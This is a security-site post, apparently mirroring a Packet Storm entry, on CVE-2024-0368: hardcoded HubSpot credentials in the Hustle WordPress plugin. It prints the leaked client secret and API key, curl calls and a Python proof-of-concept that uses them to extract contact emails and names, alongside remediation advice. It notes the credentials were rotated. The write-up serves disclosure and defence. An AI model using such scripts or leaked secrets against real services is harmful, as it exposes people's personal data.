{"id":34965,"date":"2026-01-09T17:49:57","date_gmt":"2026-01-09T17:49:57","guid":{"rendered":"http:\/\/localhost\/?p=34965"},"modified":"2026-01-09T17:49:57","modified_gmt":"2026-01-09T17:49:57","slug":"hustle-plugin-783-hardcoded-credentials","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=34965","title":{"rendered":"\ud83d\udcc4 Hustle Plugin 7.8.3 Hardcoded Credentials_PACKETSTORM:213677"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-09T22:37:04&#8243;,&#8221;description&#8221;:&#8221;Hustle plugin versions 7.8.3 and below contain hardcoded HubSpot API credentials in inc\/providers\/hubspot\/hustle-hubspot-api.php&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-01-09T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-01-09T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Hustle Plugin 7.8.3 Hardcoded Credentials&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:213677&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-0368&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2024-0368\\n    Hustle Plugin \\u0026lt;= 7.8.3 contains hardcoded HubSpot API credentials in inc\/providers\/hubspot\/hustle-hubspot-api.php\\n    \\n    \\n    ## Vulnerability Summary\\n    \\n    | Field | Value |\\n    |&#8212;&#8212;-|&#8212;&#8212;-|\\n    | **CVE ID** | CVE-2024-0368 |\\n    | **Title** | Hustle \\u003c= 7.8.3 &#8211; Sensitive Information Exposure via Exposed HubSpot API Keys |\\n    | **CVSS Score** | 8.6 (High) |\\n    | **Affected Plugin** | Hustle &#8211; Email Marketing, Lead Generation, Optins, Popups (`wordpress-popup`) |\\n    | **Vulnerable Versions** | \\u003c= 7.8.3 |\\n    | **Patched Version** | 7.8.4 |\\n    | **Vulnerability Type** | CWE-200: Exposure of Sensitive Information |\\n    \\n    ## Technical Analysis\\n    \\n    ### Vulnerable Code Location\\n    \\n    **File:** `inc\/providers\/hubspot\/hustle-hubspot-api.php`\\n    \\n    &#8220;`php\\n    class Hustle_HubSpot_Api extends Opt_In_WPMUDEV_API {\\n        const CLIENT_ID     = &#8216;5253e533-2dd2-48fd-b102-b92b8f250d1b&#8217;;\\n        const CLIENT_SECRET = &#8216;2ed54e79-6ceb-4fc6-96d9-58b4f98e6bca&#8217;;\\n        const HAPIKEY       = &#8216;db9600bf-648c-476c-be42-6621d7a1f96a&#8217;;\\n        const BASE_URL      = &#8216;https:\/\/app.hubspot.com\/&#8217;;\\n        const API_URL       = &#8216;https:\/\/api.hubapi.com\/&#8217;;\\n        const SCOPE         = &#8216;oauth crm.objects.contacts.write crm.lists.read crm.objects.contacts.read crm.schemas.contacts.write crm.schemas.contacts.read crm.lists.write&#8217;;\\n    &#8220;`\\n    \\n    ### Exposed Credentials\\n    \\n    | Credential | Value | Purpose |\\n    |&#8212;&#8212;&#8212;&#8212;|&#8212;&#8212;-|&#8212;&#8212;&#8212;|\\n    | `CLIENT_ID` | `5253e533-2dd2-48fd-b102-b92b8f250d1b` | OAuth2 Application Identifier |\\n    | `CLIENT_SECRET` | `2ed54e79-6ceb-4fc6-96d9-58b4f98e6bca` | OAuth2 Client Secret |\\n    | `HAPIKEY` | `db9600bf-648c-476c-be42-6621d7a1f96a` | HubSpot Legacy API Key |\\n    \\n    ### OAuth Scopes (Potential Access)\\n    \\n    The hardcoded OAuth configuration requested the following HubSpot scopes:\\n    &#8211; `oauth` &#8211; OAuth authentication\\n    &#8211; `crm.objects.contacts.write` &#8211; Create\/modify contacts\\n    &#8211; `crm.objects.contacts.read` &#8211; Read contact information (PII)\\n    &#8211; `crm.lists.read` &#8211; Read marketing lists\\n    &#8211; `crm.lists.write` &#8211; Modify marketing lists\\n    &#8211; `crm.schemas.contacts.write` &#8211; Modify contact schemas\\n    &#8211; `crm.schemas.contacts.read` &#8211; Read contact schemas\\n    \\n    ## Vulnerability Explanation\\n    \\n    ### Root Cause\\n    \\n    WPMUDEV hardcoded their own HubSpot OAuth application credentials directly in the plugin source code. This is a violation of secure development practices as:\\n    \\n    1. **Public Exposure**: WordPress plugins are open source &#8211; the code is publicly available on wordpress.org SVN repository\\n    2. **Mass Distribution**: The Hustle plugin has 100,000+ active installations\\n    3. **Shared Credentials**: All plugin installations share the same API credentials\\n    \\n    ### Attack Vector\\n    \\n    An attacker could:\\n    1. Download the vulnerable plugin from wordpress.org\\n    2. Extract the hardcoded credentials from the PHP source\\n    3. Use these credentials to authenticate to HubSpot&#8217;s API\\n    4. Access WPMUDEV&#8217;s HubSpot account and any data processed through their integration\\n    \\n    ### Potential Impact\\n    \\n    With valid credentials, an attacker could potentially:\\n    &#8211; **Read PII**: Access contact information (names, emails, phone numbers, addresses)\\n    &#8211; **Modify Data**: Create, update, or delete contacts in HubSpot\\n    &#8211; **Marketing List Access**: View and manipulate marketing lists\\n    &#8211; **Data Exfiltration**: Extract subscriber data from sites using Hustle + HubSpot integration\\n    \\n    ## Proof of Concept\\n    \\n    ### Step 1: Locate Vulnerable File\\n    \\n    &#8220;`bash\\n    # From WordPress installation\\n    cat wp-content\/plugins\/wordpress-popup\/inc\/providers\/hubspot\/hustle-hubspot-api.php | grep -A3 \\&#8221;const CLIENT\\&#8221;\\n    &#8220;`\\n    \\n    **Output:**\\n    &#8220;`php\\n    const CLIENT_ID     = &#8216;5253e533-2dd2-48fd-b102-b92b8f250d1b&#8217;;\\n    const CLIENT_SECRET = &#8216;2ed54e79-6ceb-4fc6-96d9-58b4f98e6bca&#8217;;\\n    const HAPIKEY       = &#8216;db9600bf-648c-476c-be42-6621d7a1f96a&#8217;;\\n    &#8220;`\\n    \\n    ### Step 2: Test API Key Access (Contacts)\\n    \\n    &#8220;`bash\\n    curl -X GET \\&#8221;https:\/\/api.hubapi.com\/crm\/v3\/objects\/contacts?hapikey=db9600bf-648c-476c-be42-6621d7a1f96a\\u0026limit=10\\&#8221;\\n    &#8220;`\\n    \\n    **Note:** As of testing, the API key has been rotated\/expired (expected post-disclosure):\\n    &#8220;`json\\n    {\\n      \\&#8221;status\\&#8221;: \\&#8221;error\\&#8221;,\\n      \\&#8221;message\\&#8221;: \\&#8221;The API key used to make this call is expired.\\&#8221;,\\n      \\&#8221;category\\&#8221;: \\&#8221;EXPIRED_AUTHENTICATION\\&#8221;\\n    }\\n    &#8220;`\\n    \\n    ### Step 3: Test OAuth Flow\\n    \\n    &#8220;`bash\\n    curl -X POST \\&#8221;https:\/\/api.hubapi.com\/oauth\/v1\/token\\&#8221; \\\\\\n      -H \\&#8221;Content-Type: application\/x-www-form-urlencoded\\&#8221; \\\\\\n      -d \\&#8221;grant_type=client_credentials\\u0026client_id=5253e533-2dd2-48fd-b102-b92b8f250d1b\\u0026client_secret=2ed54e79-6ceb-4fc6-96d9-58b4f98e6bca\\&#8221;\\n    &#8220;`\\n    \\n    **Response:** Credentials have been invalidated.\\n    \\n    ## Exploitation Script (Python)\\n    \\n    &#8220;`python\\n    #!\/usr\/bin\/env python3\\n    \\&#8221;\\&#8221;\\&#8221;\\n    CVE-2024-0368 &#8211; HubSpot API Key Exposure PoC\\n    Hustle Plugin \\u003c= 7.8.3\\n    \\n    This script demonstrates the vulnerability by attempting to use\\n    the exposed credentials to access HubSpot API.\\n    \\n    For authorized security testing only.\\n    \\&#8221;\\&#8221;\\&#8221;\\n    \\n    import requests\\n    import json\\n    \\n    # Hardcoded credentials from vulnerable plugin\\n    CREDENTIALS = {\\n        \\&#8221;client_id\\&#8221;: \\&#8221;5253e533-2dd2-48fd-b102-b92b8f250d1b\\&#8221;,\\n        \\&#8221;client_secret\\&#8221;: \\&#8221;2ed54e79-6ceb-4fc6-96d9-58b4f98e6bca\\&#8221;,\\n        \\&#8221;hapikey\\&#8221;: \\&#8221;db9600bf-648c-476c-be42-6621d7a1f96a\\&#8221;\\n    }\\n    \\n    HUBSPOT_API = \\&#8221;https:\/\/api.hubapi.com\\&#8221;\\n    \\n    def test_api_key():\\n        \\&#8221;\\&#8221;\\&#8221;Test if the leaked API key is still valid\\&#8221;\\&#8221;\\&#8221;\\n        print(\\&#8221;[*] Testing HubSpot API Key&#8230;\\&#8221;)\\n    \\n        url = f\\&#8221;{HUBSPOT_API}\/crm\/v3\/objects\/contacts\\&#8221;\\n        params = {\\&#8221;hapikey\\&#8221;: CREDENTIALS[\\&#8221;hapikey\\&#8221;], \\&#8221;limit\\&#8221;: 1}\\n    \\n        response = requests.get(url, params=params)\\n        data = response.json()\\n    \\n        if response.status_code == 200:\\n            print(\\&#8221;[+] API Key is VALID &#8211; Vulnerability Exploitable!\\&#8221;)\\n            print(f\\&#8221;[+] Retrieved contact data: {json.dumps(data, indent=2)}\\&#8221;)\\n            return True\\n        else:\\n            print(f\\&#8221;[-] API Key status: {data.get(&#8216;message&#8217;, &#8216;Unknown error&#8217;)}\\&#8221;)\\n            return False\\n    \\n    def test_oauth():\\n        \\&#8221;\\&#8221;\\&#8221;Test OAuth client credentials\\&#8221;\\&#8221;\\&#8221;\\n        print(\\&#8221;[*] Testing OAuth credentials&#8230;\\&#8221;)\\n    \\n        url = f\\&#8221;{HUBSPOT_API}\/oauth\/v1\/token\\&#8221;\\n        data = {\\n            \\&#8221;grant_type\\&#8221;: \\&#8221;client_credentials\\&#8221;,\\n            \\&#8221;client_id\\&#8221;: CREDENTIALS[\\&#8221;client_id\\&#8221;],\\n            \\&#8221;client_secret\\&#8221;: CREDENTIALS[\\&#8221;client_secret\\&#8221;]\\n        }\\n    \\n        response = requests.post(url, data=data)\\n        result = response.json()\\n    \\n        if \\&#8221;access_token\\&#8221; in result:\\n            print(\\&#8221;[+] OAuth credentials VALID &#8211; Got access token!\\&#8221;)\\n            return result[\\&#8221;access_token\\&#8221;]\\n        else:\\n            print(f\\&#8221;[-] OAuth status: {result.get(&#8216;message&#8217;, &#8216;Invalid credentials&#8217;)}\\&#8221;)\\n            return None\\n    \\n    def extract_contacts(api_key=None, access_token=None):\\n        \\&#8221;\\&#8221;\\&#8221;Extract contacts if credentials are valid\\&#8221;\\&#8221;\\&#8221;\\n        print(\\&#8221;[*] Attempting to extract contacts&#8230;\\&#8221;)\\n    \\n        url = f\\&#8221;{HUBSPOT_API}\/crm\/v3\/objects\/contacts\\&#8221;\\n        headers = {}\\n        params = {\\&#8221;limit\\&#8221;: 100}\\n    \\n        if access_token:\\n            headers[\\&#8221;Authorization\\&#8221;] = f\\&#8221;Bearer {access_token}\\&#8221;\\n        elif api_key:\\n            params[\\&#8221;hapikey\\&#8221;] = api_key\\n    \\n        response = requests.get(url, headers=headers, params=params)\\n    \\n        if response.status_code == 200:\\n            contacts = response.json()\\n            print(f\\&#8221;[+] Successfully extracted {len(contacts.get(&#8216;results&#8217;, []))} contacts\\&#8221;)\\n            for contact in contacts.get(\\&#8221;results\\&#8221;, [])[:5]:\\n                props = contact.get(\\&#8221;properties\\&#8221;, {})\\n                print(f\\&#8221;    &#8211; {props.get(&#8217;email&#8217;, &#8216;N\/A&#8217;)} | {props.get(&#8216;firstname&#8217;, &#8221;)} {props.get(&#8216;lastname&#8217;, &#8221;)}\\&#8221;)\\n            return contacts\\n    \\n        return None\\n    \\n    if __name__ == \\&#8221;__main__\\&#8221;:\\n        print(\\&#8221;=\\&#8221; * 60)\\n        print(\\&#8221;CVE-2024-0368 &#8211; Hustle Plugin HubSpot API Key Exposure\\&#8221;)\\n        print(\\&#8221;=\\&#8221; * 60)\\n        print()\\n    \\n        # Test leaked credentials\\n        api_valid = test_api_key()\\n        access_token = test_oauth()\\n    \\n        print()\\n        if api_valid or access_token:\\n            print(\\&#8221;[!] VULNERABILITY CONFIRMED &#8211; Credentials are still active!\\&#8221;)\\n            extract_contacts(\\n                api_key=CREDENTIALS[\\&#8221;hapikey\\&#8221;] if api_valid else None,\\n                access_token=access_token\\n            )\\n        else:\\n            print(\\&#8221;[*] Credentials have been rotated (expected post-disclosure)\\&#8221;)\\n            print(\\&#8221;[*] Vulnerability exists in code &#8211; credentials were exposed\\&#8221;)\\n    \\n        print()\\n        print(\\&#8221;=\\&#8221; * 60)\\n    &#8220;`\\n    \\n    ## Verification Results\\n    \\n    **Environment:**\\n    &#8211; WordPress: Running on Docker\\n    &#8211; Plugin Version: 7.8.2 (Vulnerable)\\n    &#8211; Vulnerable File: Confirmed present with hardcoded credentials\\n    \\n    **Credential Status:**\\n    &#8211; API Key (`HAPIKEY`): Expired\/Rotated (post-disclosure)\\n    &#8211; OAuth Credentials: Invalidated (post-disclosure)\\n    \\n    **Conclusion:** The vulnerability is **confirmed** &#8211; the hardcoded credentials exist in the source code and were previously exploitable. WPMUDEV has rotated the credentials following responsible disclosure.\\n    \\n    ## Remediation\\n    \\n    ### Vendor Fix (v7.8.4+)\\n    \\n    The patch removes hardcoded credentials and implements proper credential storage:\\n    &#8211; Credentials moved to database\/environment configuration\\n    &#8211; Users must now configure their own HubSpot API credentials\\n    &#8211; No shared credentials between installations\\n    \\n    ### User Recommendations\\n    \\n    1. **Update Immediately**: Upgrade to Hustle 7.8.4 or later\\n    2. **Reconfigure HubSpot**: Set up HubSpot integration with your own credentials\\n    3. **Audit Access Logs**: Check HubSpot for unauthorized API access during the vulnerable period\\n    \\n    ## Timeline\\n    \\n    | Date | Event |\\n    |&#8212;&#8212;|&#8212;&#8212;-|\\n    | 2024-01-05 | CVE-2024-0368 Published |\\n    | 2024-03-08 | Patch released in version 7.8.4 |\\n    | Post-disclosure | Credentials rotated by WPMUDEV |\\n    \\n    ## References\\n    \\n    &#8211; [Wordfence Advisory](https:\/\/www.wordfence.com\/threat-intel\/vulnerabilities\/id\/e6d40b41-540d-476d-afde-970845543933)\\n    &#8211; [WordPress Plugin Changeset](https:\/\/plugins.trac.wordpress.org\/changeset\/3047775\/wordpress-popup)\\n    &#8211; [HubSpot API Documentation](https:\/\/developers.hubspot.com\/docs\/api)\\n    &#8211; [NVD Entry](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2024-0368)\\n    \\n    &#8212;\\n    *Generated for authorized security research purposes*&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/213677&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:8.6,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:N\/A:N&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/213677\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-09T22:37:04&#8243;,&#8221;description&#8221;:&#8221;Hustle plugin versions 7.8.3 and below contain hardcoded HubSpot API credentials in inc\/providers\/hubspot\/hustle-hubspot-api.php&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-01-09T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-01-09T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Hustle Plugin 7.8.3 Hardcoded Credentials&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:213677&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-0368&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2024-0368\\n Hustle Plugin \\u0026lt;= 7.8.3 contains hardcoded&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,81,12,15,13,53,7,11,5],"class_list":["post-34965","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-86","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Hustle Plugin 7.8.3 Hardcoded Credentials_PACKETSTORM:213677 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=34965\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Hustle Plugin 7.8.3 Hardcoded Credentials_PACKETSTORM:213677 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-01-09T22:37:04&#8243;,&#8221;description&#8221;:&#8221;Hustle plugin versions 7.8.3 and below contain hardcoded HubSpot API credentials in inc\/providers\/hubspot\/hustle-hubspot-api.php&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-01-09T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-01-09T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Hustle Plugin 7.8.3 Hardcoded Credentials&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:213677&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-0368&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2024-0368n Hustle Plugin u0026lt;= 7.8.3 contains hardcoded...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=34965\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-09T17:49:57+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34965#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34965\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Hustle Plugin 7.8.3 Hardcoded Credentials_PACKETSTORM:213677\",\"datePublished\":\"2026-01-09T17:49:57+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34965\"},\"wordCount\":1663,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.6\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=34965#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34965\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34965\",\"name\":\"\ud83d\udcc4 Hustle Plugin 7.8.3 Hardcoded Credentials_PACKETSTORM:213677 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-09T17:49:57+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34965#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=34965\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34965#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Hustle Plugin 7.8.3 Hardcoded Credentials_PACKETSTORM:213677\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Hustle Plugin 7.8.3 Hardcoded Credentials_PACKETSTORM:213677 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=34965","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Hustle Plugin 7.8.3 Hardcoded Credentials_PACKETSTORM:213677 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-01-09T22:37:04&#8243;,&#8221;description&#8221;:&#8221;Hustle plugin versions 7.8.3 and below contain hardcoded HubSpot API credentials in inc\/providers\/hubspot\/hustle-hubspot-api.php&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-01-09T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-01-09T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Hustle Plugin 7.8.3 Hardcoded Credentials&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:213677&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-0368&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2024-0368n Hustle Plugin u0026lt;= 7.8.3 contains hardcoded...","og_url":"https:\/\/zero.redgem.net\/?p=34965","og_site_name":"zero redgem","article_published_time":"2026-01-09T17:49:57+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=34965#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=34965"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Hustle Plugin 7.8.3 Hardcoded Credentials_PACKETSTORM:213677","datePublished":"2026-01-09T17:49:57+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=34965"},"wordCount":1663,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.6","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=34965#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=34965","url":"https:\/\/zero.redgem.net\/?p=34965","name":"\ud83d\udcc4 Hustle Plugin 7.8.3 Hardcoded Credentials_PACKETSTORM:213677 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-09T17:49:57+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=34965#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=34965"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=34965#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Hustle Plugin 7.8.3 Hardcoded Credentials_PACKETSTORM:213677"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero 